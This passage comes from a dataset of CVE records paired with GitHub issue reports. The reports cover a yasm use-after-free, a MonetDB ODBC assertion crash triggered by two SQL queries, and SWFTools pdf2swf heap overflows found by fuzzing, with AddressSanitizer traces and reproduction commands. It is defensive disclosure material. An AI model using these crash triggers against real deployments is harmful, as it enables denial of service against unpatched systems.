test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f820a48f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f820d6ae82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x60e00000cd08 is located 8 bytes inside of 160-byte region [0x60e00000cd00,0x60e00000cda0) freed by thread T0 here: #0 0x7f820df682ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f820a4bfd48 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5009 #2 0x7f820a4a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f820a49b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f820a48f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f820a48f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f820d6ae82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f820df68602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f820dcb9769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f820a4b500b in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3211 #3 0x7f820a4c0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #4 0x7f820a4a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #5 0x7f820a49b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #6 0x7f820a48f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #7 0x7f820a48f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #8 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #9 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #10 0x7f820d6ae82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4830 error Shadow bytes around the buggy address: 0x0c1c7fff9950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9980: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff9990: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa =>0x0c1c7fff99a0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff99b0: fd fd fd fd fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff99c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff99d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1c7fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c1c7fff99f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==17967==ABORTING ```
AddressSanitizer: heap-use-after-free in error() modules/preprocs/nasm/nasm-pp.c:4830
https://api.github.com/repos/yasm/yasm/issues/162/comments
1
2021-05-19T08:17:11Z
2024-03-21T12:39:00Z
https://github.com/yasm/yasm/issues/162
895,137,925
162
CVE-2022-34967
2022-08-03T02:15:07.783
The assertion `stmt->Dbc->FirstStmt' failed in MonetDB Database Server v11.43.13.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7306" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.43.13:*:*:*:*:*:*:*", "matchCriteriaId": "4217E8A4-6972-44A1-B8B6-45F57F4C6486", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/MonetDB/MonetDB/issues/7306
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** ODBC Driver assertion failed **To Reproduce** command to start odbc client: ```sh apt install unixodbc # config MonetDB in $HOME/.odbc.ini ... isql monetdb -v ``` Input the following statements: ```sql SELECT avg(42) over (order by row_number() over ()); SELECT 1; ``` It will end up with an assertion failure: ``` +---------------------------------------+ | Connected! | | | | sql-statement | | help [tablename] | | quit | | | +---------------------------------------+ SQL> SELECT avg(42) over (order by row_number() over ()) [37000][MonetDB][ODBC Driver 11.44.0]unexpected end of file [ISQL]ERROR: Could not SQLPrepare SQL> SELECT 1 isql: /root/MonetDB/clients/odbc/driver/ODBCStmt.c:194: destroyODBCStmt: Assertion `stmt->Dbc->FirstStmt' failed. fish: “isql monetdb -v” terminated by signal SIGABRT (Abort) ``` **Expected behavior** ``` +---------------------------------------+ | Connected! | | | | sql-statement | | help [tablename] | | quit | | | +---------------------------------------+ SQL> SELECT avg(42) over (order by row_number() over ()) [37000][MonetDB][ODBC Driver 11.44.0]unexpected end of file [ISQL]ERROR: Could not SQLPrepare SQL> SELECT 1 +-----+ | %2 | +-----+ | 1 | +-----+ SQLRowCount returns 1 1 rows fetched ``` **Screenshots** If applicable, add screenshots to help explain your problem. **Software versions** - ODBC Driver version number: MonetDB ODBC Driver 11.44.0 - OS and version: Ubuntu 20.04, UnixODBC 2.3.6 - - MonetDB Server version number (I think that the server version doesn't matter): MonetDB Database Server v11.43.13 (hg id: ce33b6b12cd6) **Issue labeling ** Make liberal use of the labels to characterise the issue topics. e.g. identify severity, version, etc..
ODBC Driver Assertion `stmt->Dbc->FirstStmt' Failed
https://api.github.com/repos/MonetDB/MonetDB/issues/7306/comments
8
2022-06-19T01:18:36Z
2024-06-27T13:17:40Z
https://github.com/MonetDB/MonetDB/issues/7306
1,275,924,048
7,306
CVE-2022-35100
2022-08-16T21:15:10.973
SWFTools commit 772e55a2 was discovered to contain a segmentation violation via gfxline_getbbox at /lib/gfxtools.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/182" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/182
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
Hi, I currently learn to use fuzz tech to detect bugs and I found something in this repo. in order to reproduce the crash info, please attach ASAN when you compile this repo. ## heap buffer overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id3_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034354/id3_heap_buffer_overflow.zip) ### crash info ``` ==71111==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100004fce8 at pc 0x00000063ce64 bp 0x7ffdb8f7dab0 sp 0x7ffdb8f7daa8 READ of size 1 at 0x62100004fce8 thread T0 #0 0x63ce63 in DCTStream::readHuffSym(DCTHuffTable*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2825:14 #1 0x638c4a in DCTStream::readDataUnit(DCTHuffTable*, DCTHuffTable*, int*, int*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2345:17 #2 0x634338 in DCTStream::readMCURow() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2129:9 #3 0x632e98 in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2040:12 #4 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #5 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #6 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #7 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #8 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #9 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #10 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #11 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #12 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #13 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #14 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #15 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #16 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #17 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #18 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #19 0x7f645bf2ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #20 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) Address 0x62100004fce8 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2825:14 in DCTStream::readHuffSym(DCTHuffTable*) Shadow bytes around the buggy address: 0x0c4280001f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4280001f90: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa 0x0c4280001fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==71111==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id175_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034355/id175_heap_buffer_overflow.zip) ### crash info ``` ==50683==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000280 at pc 0x000000751637 bp 0x7ffe2a4712c0 sp 0x7ffe2a4712b8 READ of size 8 at 0x608000000280 thread T0 #0 0x751636 in GfxICCBasedColorSpace::getDefaultColor(GfxColor*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:923:9 #1 0x6f5e8e in Gfx::opSetFillColorSpace(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:1163:17 #2 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #3 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #4 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #5 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #6 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #7 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #8 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #9 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #10 0x7f363dd8ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x608000000280 is located 0 bytes to the right of 96-byte region [0x608000000220,0x608000000280) allocated by thread T0 here: #0 0x4f8d28 in operator new(unsigned long) /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x7497ce in GfxICCBasedColorSpace::parse(Array*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:890:8 #2 0x745a62 in GfxColorSpace::parse(Object*, StreamColorSpaceMode) /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:134:12 #3 0x6f5da4 in Gfx::opSetFillColorSpace(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc #4 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:923:9 in GfxICCBasedColorSpace::getDefaultColor(GfxColor*) Shadow bytes around the buggy address: 0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 02 fa 0x0c107fff8010: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8020: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c107fff8030: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8040: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c107fff8050:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==50683==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id293_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034357/id293_heap_buffer_overflow.zip) ### crash info ``` ==60167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000003080 at pc 0x00000092ceba bp 0x7ffe40762c20 sp 0x7ffe40762c18 WRITE of size 8 at 0x604000003080 thread T0 #0 0x92ceb9 in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:212:24 #1 0x92e224 in gfxpoly_from_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:226:5 #2 0x90989c in polyops_stroke /home/bupt/Desktop/swftools/lib/devices/polyops.c:229:23 #3 0x7c1563 in VectorGraphicOutputDev::strokeGfxline(GfxState*, _gfxline*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:612:9 #4 0x7cd69e in VectorGraphicOutputDev::stroke(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1487:5 #5 0x6eeffa in Gfx::opStroke(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:1415:12 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #13 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #14 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #15 0x7f15d7322c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x604000003080 is located 0 bytes to the right of 48-byte region [0x604000003050,0x604000003080) allocated by thread T0 here: #0 0x4b3160 in malloc /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x92c94f in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:192:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:212:24 in draw_stroke Shadow bytes around the buggy address: 0x0c087fff85c0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff85d0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff85e0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 0x0c087fff85f0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8600: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 =>0x0c087fff8610:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==60167==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id305_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034800/id305_heap-buffer-overflow.zip) ### crash info ``` ==8869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000035ae8 at pc 0x00000062399c bp 0x7ffdb53cd5e0 sp 0x7ffdb53cd5d8 WRITE of size 8 at 0x621000035ae8 thread T0 #0 0x62399b in DCTStream::reset() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:1994:15 #1 0x60dc99 in ImageStream::reset() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:337:8 #2 0x7c82aa in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1183:11 #3 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #4 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #5 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #13 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #14 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #15 0x7f2c3ecc8c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x621000035ae8 is located 0 bytes to the right of 4584-byte region [0x621000034900,0x621000035ae8) allocated by thread T0 here: #0 0x4f8d28 in operator new(unsigned long) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x60ccb7 in Stream::makeFilter(char*, Stream*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:239:11 #2 0x60b856 in Stream::addFilters(Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:112:11 #3 0x65fa23 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:203:14 #4 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #5 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #6 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:1994:15 in DCTStream::reset() Shadow bytes around the buggy address: 0x0c427fffeb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fffeb50: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa 0x0c427fffeb60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeb70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeb80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeb90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 